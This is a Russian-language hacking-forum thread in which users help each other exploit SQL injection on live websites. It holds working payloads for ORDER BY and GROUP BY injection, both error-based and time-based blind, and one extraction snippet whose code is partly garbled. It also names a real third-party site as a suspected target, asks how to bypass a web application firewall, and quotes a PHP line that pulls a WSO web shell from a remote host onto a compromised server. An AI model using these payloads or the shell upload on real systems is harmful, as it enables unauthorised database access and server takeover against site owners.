ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.11.2013, 01:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
6871
Репутация:
-3
|
|
Есть сайт который периодически спонтанно выдает такие ошибки:
Сообщение от None
Warning: mysql_connect() [function.mysql-connect]: Lost connection to MySQL server at 'reading initial communication packet', system error: 61 in /home/myfolder/data/www/site.su/redirector.php on line 229
Warning: mysql_select_db() [function.mysql-select-db]: Access denied for user 'user'@'localhost' (using password: NO) in /home/myfolder/data/www/site.su/redirector.php on line 230
Warning: mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in /home/myfolder/data/www/site.su/redirector.php on line 230
Warning: mysql_query() [function.mysql-query]: Access denied for user 'user'@'localhost' (using password: NO) in /home/myfolder/data/www/site.su/redirector.php on line 267
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/myfolder/data/www/site.su/redirector.php on line 267
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/myfolder/data/www/site.su/redirector.php on line 268
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/myfolder/data/www/site.su/redirector.php on line 272
Warning: mysql_close(): no MySQL-Link resource supplied in /home/myfolder/data/www/site.su/redirector.php on line 273
Warning: Cannot modify header information - headers already sent by (output started at /home/myfolder/data/www/site.su/redirector.php:229) in /home/myfolder/data/www/site.su/includes/application_top.php on line 33
Однако морковка (havij) так и не докапалась до бд. Скажите, эти ошибки существенны? и что можно сделать в этом случае.
иногда появляется на странице по адресу типа http://site.su/index.php?cat=x |
|
|
|
29.11.2013, 01:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
15642
Репутация:
6
|
|
Сообщение от [R
eD"]
[R]eD said:
Есть иньекция вида:
Код:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}
Пробую делать так:
Код:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1+--+1
Но получаю:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+concat((select+version()),floor(rand(0)* 2))+having+min(0)+or+1+--+1' at line 1
А если делать union select
Код:
Code:
SELECT * FROM `date` WHERE name = 'test' ORDER BY id union select 1
то получаю:
#1221 - Incorrect usage of UNION and ORDER BY
Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать? Инъекция в ORDER BY.
Такие инжекты крутите, как блайнд:
Код:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id AND IF(SUBSTR(VERSION(),1,1)=5,SLEEP(5),0)
|
|
|
|
29.11.2013, 01:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
51991
Репутация:
2
|
|
ex'pert
SQLmap или руками.
|
|
|
|
29.11.2013, 10:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от [R
eD"]
[R]eD said:
Есть иньекция вида:
Код:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}
Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать? Дополню ответ, который дал UXOR(может кому будет полезно):
Для эксплуатации инъекций применяется слепой метод:
Бинарный поиск всем знаком. Для того, чтобы вытащить 1 символ, нам необходимо послать 8 запросов.
Код:
Code:
SELECT if(ascii(substr(version(),1,1)) 0,
# pow - возведение 2 в степень для получения необходимого числа:
# 2^0 = 1 = 00000001
# 2^1 = 2 = 00000010
# 2^2 = 4 = 00000100
# Так-же для этих целий можно использовать побитовый сдвиг
# он и короче, но символы могут фильтроваться
# (Выше они используются для упрощения)
# 1 > (SELECT 1) = 2
id, -id
))), 1000) LIMIT 9;
Так, что есть пища для размышления.
|
|
|
|
29.11.2013, 13:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Нашёл, вроде как скулю, но что-то есть сомнения..
Код:
Code:
http://www.maxgame.com.ua/index.php?route=product/product&path=76'&product_id=852
|
|
|
|
29.11.2013, 14:01
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
UXOR, YaBtr, Вы что-то не то советуете.
Сообщение от [R
eD"]
[R]eD said:
Есть иньекция вида:
Код:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+concat((select+version()),floor(rand(0)* 2))+having+min(0)+or+1+--+1' at line 1
Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать?
Код:
Code:
ORDER BY id|(SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))
Если бы инъекция была в GROUP BY, то тогда так:
Код:
Code:
GROUP BY id is null, concat((SELECT version()),floor(rand(0)*2)) having min(0)
Unknowhacker, там нет инъекции.
|
|
|
30.11.2013, 00:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от ZARO
ZARO said:
Не обязательно. Если хочешь шелл в текущую папку залить, где скрипт выполняется, то надо в его случае:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://site.ru/wso2_pack.txt'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'./wso2_pack.php'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Можно пример? А т залиться не получается...да и с багами такими первый раз судьбу связал)
http://blogs.simplefit.ru/recipe/rss/
|
|
|
|
30.11.2013, 00:51
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
Провел на форуме:
1034
Репутация:
0
|
|
Привет всем!
Как обойти фильтрацию incapsula при SQL-инъекции?
Спасибо.
|
|
|
|
30.11.2013, 01:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
77731
Репутация:
33
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Нашёл, вроде как скулю, но что-то есть сомнения..
Код:
Code:
http://www.maxgame.com.ua/index.php?route=product/product&path=76'&product_id=852
нет там ничего ИМХО
|
|
|
|
01.12.2013, 09:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
61136
Репутация:
32
|
|
Попытка слепого метода в Havij
Почему когда Length of 'Current DB' is 16 все выводит нормально
А когда Length of 'Current DB' is 63 выводится все в кубиках ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
